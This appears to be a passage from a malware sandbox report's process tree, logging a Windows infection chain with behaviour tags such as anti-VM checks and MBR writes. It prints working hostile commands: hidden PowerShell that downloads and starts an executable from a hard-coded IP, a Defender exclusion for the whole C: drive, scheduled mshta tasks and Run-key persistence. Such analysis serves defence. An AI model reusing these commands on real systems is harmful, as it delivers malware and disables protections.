C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵
- System Location Discovery: System Language Discovery
PID:2608
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵
- System Location Discovery: System Language Discovery
PID:6432
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵
- System Location Discovery: System Language Discovery
PID:6380
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵
- System Location Discovery: System Language Discovery
PID:3868
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵
- System Location Discovery: System Language Discovery
PID:4360
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:2032
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:3896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361780101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10361780101\TbV75ZR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3116 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:2492 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 4885⤵
- Program crash
PID:3916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361790101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10361790101\Rm3cVPI.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3580
-
-
C:\Users\Admin\AppData\Local\Temp\10361800101\xZRvIQ5.exe"C:\Users\Admin\AppData\Local\Temp\10361800101\xZRvIQ5.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7092 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:4484
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:7080
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361810101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10361810101\u75a1_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:7116 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵PID:6444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
PID:4756
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4980 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵
- Executes dropped EXE
PID:5584
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵
- Deletes itself
- Executes dropped EXE
PID:2260 -
C:\Users\Admin\AppData\Local\Temp\{cac49f1a-6569-4ad2-98cc-57bb9562c18e}\36575e69.exe"C:\Users\Admin\AppData\Local\Temp\{cac49f1a-6569-4ad2-98cc-57bb9562c18e}\36575e69.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot6⤵
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:8188 -
C:\Users\Admin\AppData\Local\Temp\{fd9989c1-9e82-4819-a5b2-63078bff6123}\a28245d7.exeC:/Users/Admin/AppData/Local/Temp/{fd9989c1-9e82-4819-a5b2-63078bff6123}/\a28245d7.exe -accepteula -adinsilent -silent -processlevel 2 -postboot7⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Checks for any installed AV software in registry
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: LoadsDriver
PID:7564
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361820101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10361820101\EPTwCQd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4992 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:4352
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361830101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10361830101\bot.exe"3⤵
- Executes dropped EXE
PID:976 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe4⤵
- Executes dropped EXE
PID:3516 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe5⤵
- Executes dropped EXE
PID:6608 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe6⤵
- Executes dropped EXE
PID:1520 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe7⤵
- Executes dropped EXE
PID:6428 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe8⤵
- Executes dropped EXE
PID:6796 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe9⤵
- Executes dropped EXE
PID:1808 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe10⤵
- Executes dropped EXE
PID:5200 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe11⤵
- Executes dropped EXE
PID:7052 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe12⤵
- Executes dropped EXE
PID:4856 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe13⤵
- Executes dropped EXE
PID:6388 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe14⤵
- Executes dropped EXE
PID:1344 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe15⤵
- Executes dropped EXE
PID:7112 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe16⤵
- Executes dropped EXE
PID:5940 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe17⤵
- Executes dropped EXE
PID:4492 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe18⤵
- Executes dropped EXE
PID:1500 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe19⤵
- Executes dropped EXE
PID:1084 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe20⤵
- Executes dropped EXE
PID:1408 -
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_update.exe"21⤵
- Modifies registry key
PID:9280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe\"'"21⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
PID:3500
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361840101\fd5d9b8176.exe"C:\Users\Admin\AppData\Local\Temp\10361840101\fd5d9b8176.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:13160 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10361840101\fd5d9b8176.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:12980
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361850101\cf533b34eb.exe"C:\Users\Admin\AppData\Local\Temp\10361850101\cf533b34eb.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6588 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10361850101\cf533b34eb.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:8148
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361860101\4220f70f80.exe"C:\Users\Admin\AppData\Local\Temp\10361860101\4220f70f80.exe"3⤵
- Suspicious use of SetThreadContext
PID:7796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5612
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361870101\9ff7443f7f.exe"C:\Users\Admin\AppData\Local\Temp\10361870101\9ff7443f7f.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:7956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn UmbFjmam8Jo /tr "mshta C:\Users\Admin\AppData\Local\Temp\pVedJJdJJ.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn UmbFjmam8Jo /tr "mshta C:\Users\Admin\AppData\Local\Temp\pVedJJdJJ.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:9104
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\pVedJJdJJ.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:9224 -
C:\Users\Admin\AppData\Local\TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE"C:\Users\Admin\AppData\Local\TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:10624
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10361880121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:10492 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:10544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:10792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:10888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:10972 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:10960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:11108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:11092
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "leysBmanSh5" /tr "mshta \"C:\Temp\r7Zd9ek18.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:11436
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\r7Zd9ek18.hta"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:11444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:11572 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:12232
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:4900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3548
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3688
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3608
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:2788
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:5524
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4404
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2492 -ip 24921⤵PID:6020
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:6112
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:6092
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe"1⤵PID:5612
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe2⤵
- Executes dropped EXE
PID:3784 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe3⤵
- Executes dropped EXE
PID:7248 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe4⤵
- Executes dropped EXE
PID:7368 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe5⤵
- Executes dropped EXE
PID:7412 -
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"6⤵
- Modifies registry key
PID:7452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe\"'"6⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
PID:7516
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe"1⤵PID:7684
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe2⤵
- Executes dropped EXE
PID:7728 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe3⤵
- Executes dropped EXE
PID:7776 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe4⤵
- Executes dropped EXE
PID:7836 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe5⤵
- Executes dropped EXE
PID:7884 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe6⤵
- Executes dropped EXE
PID:7940 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe7⤵
- Executes dropped EXE
PID:7984 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe8⤵
- Executes dropped EXE
PID:8036 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe9⤵
- Executes dropped EXE
PID:8076 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe10⤵
- Executes dropped EXE
PID:8128 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe11⤵
- Executes dropped EXE
PID:8180 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe12⤵
- Executes dropped EXE
PID:8228 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe13⤵
- Executes dropped EXE
PID:8260 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe14⤵
- Executes dropped EXE
PID:8304 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe15⤵
- Executes dropped EXE
PID:8352 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe16⤵
- Executes dropped EXE
PID:8396 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe17⤵
- Executes dropped EXE
PID:8432 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe18⤵
- Executes dropped EXE
PID:8496 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe19⤵
- Executes dropped EXE
PID:8528 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe20⤵
- Executes dropped EXE
PID:8580 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe21⤵
- Executes dropped EXE
PID:8640 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe22⤵
- Executes dropped EXE
PID:8680 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe23⤵PID:8724
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe24⤵PID:8776
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe25⤵PID:8820
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe26⤵PID:8872
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe27⤵PID:8920
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe28⤵PID:8964
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe29⤵PID:9008
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe30⤵PID:9064
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe31⤵PID:9108
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe32⤵PID:9156
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe33⤵PID:9208
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe34⤵PID:9260
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe35⤵PID:9312
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe36⤵PID:9360
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe37⤵PID:9404
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatformw.exe"38⤵
- Modifies registry key
PID:9444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatformw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe\"'"38⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
PID:9500
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe"1⤵PID:9644
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe2⤵PID:9704
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe3⤵PID:9744
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe4⤵PID:9792
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe5⤵PID:9844
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe6⤵PID:9888
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe7⤵PID:9944
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe8⤵PID:9988
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe9⤵PID:10044
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_service.exe"10⤵
- Modifies registry key
PID:10080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe\"'"10⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
PID:10120
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe"1⤵PID:10264
-
